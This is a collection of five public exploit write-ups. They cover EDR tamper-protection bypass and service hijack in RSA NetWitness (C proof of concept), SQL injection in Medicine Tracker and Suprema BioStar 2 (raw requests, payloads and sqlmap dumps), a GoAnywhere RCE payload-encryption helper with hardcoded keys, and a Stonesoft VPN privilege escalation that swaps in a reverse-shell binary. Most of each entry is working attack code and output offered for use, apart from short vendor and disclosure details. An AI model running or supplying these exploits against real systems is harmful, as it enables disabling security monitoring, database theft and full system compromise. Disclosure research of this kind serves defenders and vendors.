# Exploit Title: RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] RSA Security www.netwitness.com [Product] NetWitness Endpoint EDR Agent The RSA NetWitness detection and response (EDR) endpoint monitors activity across all your endpoints—on and off the network—providing deep visibility into their security state, and it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by rapidly detecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost, time and scope of incident response. [Vulnerability Type] Incorrect Access Control / Code Execution [CVE Reference] CVE-2022-47529 [Security Issue] CVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending the events to SIEM or make the agent run user-supplied commands. Insecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through 12.x allow local and admin Windows user accounts to modify the endpoint agent service configuration: to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification. Interestingly, the agent was uploaded to virustotal on 2022-01-05 17:24:32 UTC months before finding and report. SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d LANDeskService.exe [Severity] Critical [Impact(s)] Denial-of-Service Arbitrary Code Execution [Attack Vector] To exploit, open handle to memory objects held by the endpoint agent, modify the ACL for the ones that have insecure ACLs, and DENY access to Everyone group [Affected Product Code Base] All versions prior to v12.2 [Network Access] Local [References] https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935 [Vuln Code Block]: 00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p .text:00000001400F7B10 ; sub_14013BA50+19?p .text:00000001400F7B10 ; DATA XREF: ... .text:00000001400F7B10 push rbx .text:00000001400F7B12 sub rsp, 20h .text:00000001400F7B16 mov rbx, rcx .text:00000001400F7B19 test rcx, rcx .text:00000001400F7B1C jz short loc_1400F7B5C .text:00000001400F7B1E call cs:InitializeCriticalSection .text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection .text:00000001400F7B28 call cs:InitializeCriticalSection .text:00000001400F7B2E mov edx, 1 ; bManualReset .text:00000001400F7B33 xor r9d, r9d ; lpName .text:00000001400F7B36 mov r8d, edx ; bInitialState .text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes .text:00000001400F7B3B call cs:CreateEventW .text:00000001400F7B41 mov [rbx+50h], rax .text:00000001400F7B45 mov dword ptr [rbx+58h], 0 .text:00000001400F7B4C test rax, rax .text:00000001400F7B4F jz short loc_1400F7B5C [Exploit/POC] "RSA_NetWitness_Exploit.c" #include "windows.h" #include "stdio.h" #include "accctrl.h" #include "aclapi.h" #define OPEN_ALL_ACCESS 0x1F0003 /* RSA NetWitness EDR Endpoint Agent Tamper Protection Bypass / EoP Code Execution RSA NetWitness.msi --> NWEAgent.exe MD5: c0aa7e52cbf7799161bac9ebefa38d49 Expected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent. Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged standard non-administrator user. By John Page (hyp3rlinx) - Nov 2022 DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever from testing, modifying and or misuse. Users of this supplied PoC code accept all risks, do no harm. X64 PE file vuln code block: 00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p .text:00000001400F7B10 ; sub_14013BA50+19?p .text:00000001400F7B10 ; DATA XREF: ... .text:00000001400F7B10 push rbx .text:00000001400F7B12 sub rsp, 20h .text:00000001400F7B16 mov rbx, rcx .text:00000001400F7B19 test rcx, rcx .text:00000001400F7B1C jz short loc_1400F7B5C .text:00000001400F7B1E call cs:InitializeCriticalSection .text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection .text:00000001400F7B28 call cs:InitializeCriticalSection .text:00000001400F7B2E mov edx, 1 ; bManualReset .text:00000001400F7B33 xor r9d, r9d ; lpName .text:00000001400F7B36 mov r8d, edx ; bInitialState .text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes .text:00000001400F7B3B call cs:CreateEventW .text:00000001400F7B41 mov [rbx+50h], rax .text:00000001400F7B45 mov dword ptr [rbx+58h], 0 .text:00000001400F7B4C test rax, rax .text:00000001400F7B4F jz short loc_1400F7B5C 1) Install "RSA NetWitness.msi" (Endpoint EDR Agent) 2) Run Exploit PoC as a Standard non-admin user, the PoC will: a) Open a handle (copy) to Ecat002 event. b) Open additional handles for events Ecat004 and Ecat002, modifying them to deny access to Everyone group. c) Set/Reset event the Ecat002 handle. d) if admin privs change the EDR service configuration Non vulnerable agents will output "Not vulnerable to the console", customers can modify and use test to see if vuln. */ char Vuln_Events[][32] = {"Global\\Ecat004", "Global\\Ecat002"}; BOOL PWNED=FALSE; void Exploit(); int AdminChl(); void HijackSvcConfig(); int main(void){ printf("[+] RSA NetWitness EDR Agent 0Day\n"); printf("[+] CVE-2022-47529\n"); printf("[+] Discovery: John Page (aka hyp3rlinx)\n"); printf("[+] ===================================\n"); Exploit(); if( AdminChk() ){ printf("[+] Hijacked NetWitness Agent Service!\n"); HijackSvcConfig(); } Sleep(2000); printf("[+] Done!\n\n"); system("pause"); return 0; } void Exploit(){ PACL pOldDACL = NULL; PACL pNewDACL = NULL; HANDLE hEvent_Ecat002 = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)"Global\\Ecat002"); int i=0; for(; i < sizeof(Vuln_Events) / sizeof(Vuln_Events[0]); i++){ HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)Vuln_Events[i]); if(hEvent != INVALID_HANDLE_VALUE){ printf("[-] Targeting Event: %s\n", Vuln_Events[i]); Sleep(500); if(GetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) == ERROR_SUCCESS){ TRUSTEE trustee[1]; trustee[0].TrusteeForm = TRUSTEE_IS_NAME; trustee[0].TrusteeType = TRUSTEE_IS_GROUP; trustee[0].ptstrName = TEXT("Everyone"); trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE; trustee[0].pMultipleTrustee = NULL; EXPLICIT_ACCESS explicit_access_list[1]; ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS)); explicit_access_list[0].grfAccessMode = DENY_ACCESS; explicit_access_list[0].grfAccessPermissions = GENERIC_ALL; explicit_access_list[0].grfInheritance = NO_INHERITANCE; explicit_access_list[0].Trustee = trustee[0]; if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){ printf("%s%d", "[!] Not vulnerable! ", GetLastError()); } if(SetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){ printf("%s%d", "[!] Not vulnerable! ", GetLastError()); }else{ SetEvent(hEvent_Ecat002); Sleep(1000); ResetEvent(hEvent_Ecat002); CloseHandle(hEvent_Ecat002); SetEvent(hEvent); Sleep(1000); PWNED=TRUE; } if(PWNED){ LocalFree(pNewDACL); LocalFree(pOldDACL); CloseHandle(hEvent); } Sleep(1000); } } } } //If run as admin, modify the agent service config to run our own code. int AdminChk(){ int result = 0; HANDLE hToken = NULL; if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY,&hToken)){ TOKEN_ELEVATION elevated; DWORD tokSize = sizeof(TOKEN_ELEVATION); if(GetTokenInformation(hToken, TokenElevation, &elevated, sizeof(elevated), &tokSize)){ result = elevated.TokenIsElevated; } } if(hToken){ CloseHandle(hToken); } return result; } //Trivial example modify the service config... void HijackSvcConfig(){ Sleep(1000); WinExec("sc failure NWEAgent command= ""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "Evil-Command-Here""", 0); } [POC Video URL] https://www.youtube.com/watch?v=kO1fu4IOlSs [Disclosure Timeline] Vendor Notification: December 2, 2022 CVE assigned: December 19, 2022 Hotfix v12.1.0.1: January 3, 2023 Fixed in v12.2.0.0 January 4, 2023 Restested for vendor: January 6, 2023 March 24, 2023 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Title: Medicine Tracker System v1.0 - Sql Injection # Exploit Author: Sanjay Singh # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip # Version: V1.0.0 # Tested on: Windows/Linux # Proof of Concept: # 1- http://localhost/php-mts/app/login.php # 2- login with default credential # 3- Click left side Manage account and fill Update User Details and click update account # 4- Capture request using burp suite # 5- Save request request.txt Sqlmap POST /php-mts/classes/Users.php?f=save_user HTTP/1.1 Host: localhost Content-Length: 661 sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeOo3CzyRX6fHexZx X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/php-mts/app/?page=manage_account Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=ocj11iinu8pn536i3cdia0faql Connection: close ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="id" 1'-' ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="firstname" gogo ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="middlename" ogo ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="lastname" singh ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="username" [email protected] ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="password" 12345678 ------WebKitFormBoundaryeOo3CzyRX6fHexZx-- sqlmap sqlmap -r request.txt -p "id" --dbs --batch ___ __H__ ___ ___["]_____ ___ ___ {1.6.12#stable} |_ -| . ['] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 13:18:01 /2023-03-21/ [13:18:01] [INFO] parsing HTTP request from 'request.txt' it appears that provided value for POST parameter 'id' has boundaries. Do you want to inject inside? ('' or true*--') [y/N] N [13:18:01] [INFO] resuming back-end DBMS 'mysql' [13:18:01] [INFO] testing connection to the target URL [13:18:01] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=' or true AND (SELECT 3138 FROM(SELECT COUNT(*),CONCAT(0x7178787171,(SELECT (ELT(3138=3138,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mDhI--&name=para&description=ss Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=' or true AND (SELECT 8994 FROM (SELECT(SLEEP(5)))doso)-- HjCh--&name=para&description=ss --- [13:18:01] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.54, PHP 8.0.25 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [13:18:01] [INFO] fetching database names [13:18:01] [INFO] resumed: 'information_schema' [13:18:01] [INFO] resumed: 'art_gallery' [13:18:01] [INFO] resumed: 'hcpms' [13:18:01] [INFO] resumed: 'mts_db' [13:18:01] [INFO] resumed: 'mysql' [13:18:01] [INFO] resumed: 'performance_schema' [13:18:01] [INFO] resumed: 'phpmyadmin' [13:18:01] [INFO] resumed: 'sscdms_db' [13:18:01] [INFO] resumed: 'test' available databases [9]: [*] art_gallery [*] hcpms [*] information_schema [*] mts_db [*] mysql [*] performance_schema [*] phpmyadmin [*] sscdms_db [*] test [13:18:01] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.1.2' [*] ending @ 13:18:01 /2023-03-21/

// Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE) // Google Dork: title:"GoAnywhere" // Date: 3/26/2023 // Exploit Author: Youssef Muhammad // Vendor Homepage: https://www.goanywhere.com/ // Software Link: https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0 // Version: > 7.1.1 for windows / > 7.0.3 for Linux // Tested on: Windows, Linux // CVE : CVE-2023-0669 // This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution import java.util.Base64; import javax.crypto.Cipher; import java.nio.charset.StandardCharsets; import javax.crypto.SecretKeyFactory; import javax.crypto.spec.PBEKeySpec; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.SecretKeySpec; import java.nio.file.Files; import java.nio.file.Paths; public class CVE_2023_0669_helper { static String ALGORITHM = "AES/CBC/PKCS5Padding"; static byte[] KEY = new byte[30]; static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8); public static void main(String[] args) throws Exception { if (args.length != 2) { System.out.println("Usage: java CVE_2023_0669_helper <file_path> <version>"); System.exit(1); } String filePath = args[0]; String version = args[1]; byte[] fileContent = Files.readAllBytes(Paths.get(filePath)); String encryptedContent = encrypt(fileContent, version); System.out.println(encryptedContent); } public static String encrypt(byte[] data, String version) throws Exception { Cipher cipher = Cipher.getInstance(ALGORITHM); KEY = (version.equals("2")) ? getInitializationValueV2() : getInitializationValue(); SecretKeySpec keySpec = new SecretKeySpec(KEY, "AES"); IvParameterSpec ivSpec = new IvParameterSpec(IV); cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec); byte[] encryptedObject = cipher.doFinal(data); String bundle = Base64.getUrlEncoder().encodeToString(encryptedObject); String v = (version.equals("2")) ? "$2" : ""; bundle += v; return bundle; } private static byte[] getInitializationValue() throws Exception { // Version 1 Encryption String param1 = "go@nywhereLicenseP@$$wrd"; byte[] param2 = {-19, 45, -32, -73, 65, 123, -7, 85}; return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 9535, 256)).getEncoded(); } private static byte[] getInitializationValueV2() throws Exception { // Version 2 Encryption String param1 = "pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R"; byte[] param2 = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73}; return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 3392, 256)).getEncoded(); } }

# Exploit Title: Suprema BioStar 2 v2.8.16 - SQL Injection # Date: 26/03/2023 # Exploit Author: Yuriy (Vander) Tsarenko (https://www.linkedin.com/in/yuriy-tsarenko-a1453aa4/) # Vendor Homepage: https://www.supremainc.com/ # Software Link: https://www.supremainc.com/en/platform/hybrid-security-platform-biostar-2.asp # Software Download: https://support.supremainc.com/en/support/solutions/articles/24000076543--biostar-2-biostar-2-8-16-new-features-and-configuration-guide # Version: 2.8.16 # Tested on: Windows, Linux # CVE-2023-27167 ## Description A Boolean-based SQL injection/Time based SQL vulnerability in the page (/api/users/absence?search_month=1) in Suprema BioStar 2 v2.8.16 allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "values" JSON parameter. ## Request PoC #1 ''' POST /api/users/absence?search_month=1 HTTP/1.1 Host: biostar2.server.net User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: application/json, text/plain, */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate content-type: application/json;charset=UTF-8 content-language: en bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548 Content-Length: 204 Origin: https://biostar2.server.net Connection: close Referer: https://biostar2.server.net/ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(4)))a)",4840,20120]}],"orders":[],"total":false}} ''' Time based SQL injection (set 4 – response delays for 8 seconds). ''' ## Request PoC #2 ''' POST /api/users/absence?search_month=1 HTTP/1.1 Host: biostar2.server.net User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: application/json, text/plain, */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate content-type: application/json;charset=UTF-8 content-language: en bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548 Content-Length: 188 Origin: https://biostar2.server.net Connection: close Referer: https://biostar2.server.net/ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}} ''' Boolean-based SQL injection (payload “1 and 3523=03523” means “1 and True”, so we can see information in response, regarding user with id 1, which is admin) ''' ## Exploit with SQLmap Save the request from Burp Suite to file. ''' --- Parameter: JSON #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}} Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(7)))a)",4840,20120]}],"orders":[],"total":false}} --- [05:02:49] [INFO] testing MySQL [05:02:49] [INFO] confirming MySQL [05:02:50] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL > 5.0.0 (MariaDB fork) [05:02:50] [INFO] fetching database names [05:02:50] [INFO] fetching number of databases [05:02:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [05:02:55] [INFO] retrieved: 2 [05:03:12] [INFO] retrieved: biostar2_ac [05:03:56] [INFO] retrieved: information_schema available databases [2]: [*] biostar2_ac [*] information schema '''

# Exploit Title: Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation # Exploit Author : TOUHAMI KASBAOUI # Vendor Homepage : https://www.forcepoint.com/ # Software: Stonesoft VPN Windows # Version : 6.2.0 / 6.8.0 # Tested on : Windows 10 # CVE : N/A #Description local privilege escalation vertical from Administrator to NT AUTHORITY / SYSTEM #define UNICODE #define _UNICODE #include <Windows.h> #include <iostream> using namespace std; enum Result { unknown, serviceManager_AccessDenied, serviceManager_DatabaseDoesNotExist, service_AccessDenied, service_InvalidServiceManagerHandle, service_InvalidServiceName, service_DoesNotExist, service_Exist }; Result ServiceExists(const std::wstring& serviceName) { Result r = unknown; SC_HANDLE manager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, GENERIC_READ); if (manager == NULL) { DWORD lastError = GetLastError(); if (lastError == ERROR_ACCESS_DENIED) return serviceManager_AccessDenied; else if (lastError == ERROR_DATABASE_DOES_NOT_EXIST) return serviceManager_DatabaseDoesNotExist; else return unknown; } SC_HANDLE service = OpenService(manager, serviceName.c_str(), GENERIC_READ); if (service == NULL) { DWORD error = GetLastError(); if (error == ERROR_ACCESS_DENIED) r = service_AccessDenied; else if (error == ERROR_INVALID_HANDLE) r = service_InvalidServiceManagerHandle; else if (error == ERROR_INVALID_NAME) r = service_InvalidServiceName; else if (error == ERROR_SERVICE_DOES_NOT_EXIST) r = service_DoesNotExist; else r = unknown; } else r = service_Exist; if (service != NULL) CloseServiceHandle(service); if (manager != NULL) CloseServiceHandle(manager); return r; } bool ChangeName() { LPCWSTR parrentvpnfilename = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe"; LPCWSTR newName = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn_old.exe"; bool success = MoveFile(parrentvpnfilename, newName); if (success) { cerr << "[+] SVGVPN filename changed.\n"; } else { cerr << "Failed to rename file \n"; } return 0; } int main() { const uint8_t shellcode[7168] = { 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, }; //You can set array bin of your reverse shell PE file here std::wstring serviceName = L"sgipsecvpn"; Result result = ServiceExists(serviceName); if (result == service_Exist) std::wcout << L"The VPN service '" << serviceName << "' exists." << std::endl; else if (result == service_DoesNotExist) std::wcout << L"The service '" << serviceName << "' does not exist." << std::endl; else std::wcout << L"An error has occurred, and it could not be determined whether the service '" << serviceName << "' exists or not." << std::endl; ChangeName(); HANDLE fileHandle = CreateFile(L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); cerr << "[*] Loading Malicious file into main PE of Forcepoint Installer \n"; if (fileHandle == INVALID_HANDLE_VALUE) { cerr << "Failed to create shellcode\n"; return 1; } DWORD bytesWritten; if (!WriteFile(fileHandle, shellcode, sizeof(shellcode), &bytesWritten, NULL)) { cerr << "Failed to write to file\n"; CloseHandle(fileHandle); return 1; } CloseHandle(fileHandle); cout << "[+] Payload exported to ForcePointVPN \n"; Sleep(30); cout << "[+] Restart ForcePointVPN Service \n"; SC_HANDLE scmHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); SC_HANDLE serviceHandle = OpenService(scmHandle, TEXT("sgipsecvpn"), SERVICE_ALL_ACCESS); SERVICE_STATUS serviceStatus; QueryServiceStatus(serviceHandle, &serviceStatus); if (serviceStatus.dwCurrentState == SERVICE_RUNNING) { ControlService(serviceHandle, SERVICE_CONTROL_STOP, &serviceStatus); while (serviceStatus.dwCurrentState != SERVICE_STOPPED) { QueryServiceStatus(serviceHandle, &serviceStatus); Sleep(1000); } } StartService(serviceHandle, NULL, NULL); CloseServiceHandle(serviceHandle); CloseServiceHandle(scmHandle); return 0; }